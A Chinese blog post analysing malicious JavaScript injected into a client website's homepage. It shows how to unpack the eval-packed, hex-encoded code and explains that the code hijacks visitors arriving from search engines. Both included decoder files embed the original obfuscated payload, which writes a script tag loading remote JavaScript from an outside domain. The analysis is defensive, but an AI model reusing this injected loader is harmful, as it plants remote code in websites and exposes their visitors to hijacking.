有客户反映网站被植入一些奇怪的代码,让帮忙看下,查看网站源代码,发现有JS代码被植入网站首页文件,并且使用加密算法加密了代码
这里可以构造解密代码进行解密
其实这个eval(function(p,a,c,k,e,d){}))中自带解码函数e().
while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p
while循环产生的每个p就是解码后的函数代码,我们删掉源码中的return p,不用将结果返回,
而是直接输出在一个文本区域中,如document.getElementById(”textareaID”).innerText=p.
只需要复制script里的代码到解密代码中并替换returu p这个代码
最终代码:
保存为html文件,然后运行
这里已经解密为一段16进制编码的script代码,还需要通过复制16进制的代码解析出详细的代码
复制到另外一个解析代码中,注意复制过来的括号及符号需要删除为图下格式,不然是解析不了的
然后运行html文件,可以看到js文件已经被解析出来了
这个js的意思就是,访问该网站的链接中,包含上边s.indexOf定义的字符串都会跳转到指定的非法网站
所以有些网站被百度收录了,然后通过百度搜索打开网站就跳转到其他网站了,就会被劫持,直接输入域名就不会跳转。
附上代码:
解密代码1
<!DOCTYPE html P LIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> 解密代码</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
</head>
<body>
<textarea id="textareaID" rows="25" cols="50"></textarea>
<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);document.getElementById('textareaID').innerText=p;}}}('j["\\7\\e\\1\\l\\i\\9\\m\\0"]["\\8\\5\\a\\0\\9"](\'\\g\\2\\1\\5\\a\\3\\0 \\0\\k\\3\\9\\d\\6\\0\\9\\q\\0\\4\\f\\b\\r\\b\\2\\1\\5\\a\\3\\0\\6 \\2\\5\\1\\d\\6\\p\\0\\0\\3\\2\\n\\4\\4\\8\\8\\8\\c\\1\\3\\7\\b\\2\\o\\c\\1\\e\\i\\4\\7\\7\\c\\f\\2\\6\\h\\g\\4\\2\\1\\5\\a\\3\\0\\h\');',28,28,'x74|x63|x73|x70|x2f|x72|x22|x64|x77|x65|x69|x61|x2e|x3d|x6f|x6a|x3c|x3e|x6d|window|x79|x75|x6e|x3a|x38|x68|x78|x76'.split('|'),0,{}))
</script>
</body>
</html>
解密代码2
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> 解密</title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
<meta name="Author" content=www.gemingcao.com />
<meta name="Keywords" content="" />
<meta name="Description" content="" />
</head>
<body>
<script language="javascript">alert("\x64\x6f\x63\x75\x6d\x65\x6e\x74\x77\x72\x69\x74\x65 \x3c\x73\x63\x72\x69\x70\x74 \x74\x79\x70\x65\x3d\x22\x74\x65\x78\x74\x2f\x6a\x61\x76\x61\x73\x63\x72\x69\x70\x74\x22 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x73\x3a\x2f\x2f\x77\x77\x77\x2e\x63\x70\x64\x61\x73\x38\x2e\x63\x6f\x6d\x2f\x64\x64\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e");</script>
</body>
</html> 全文完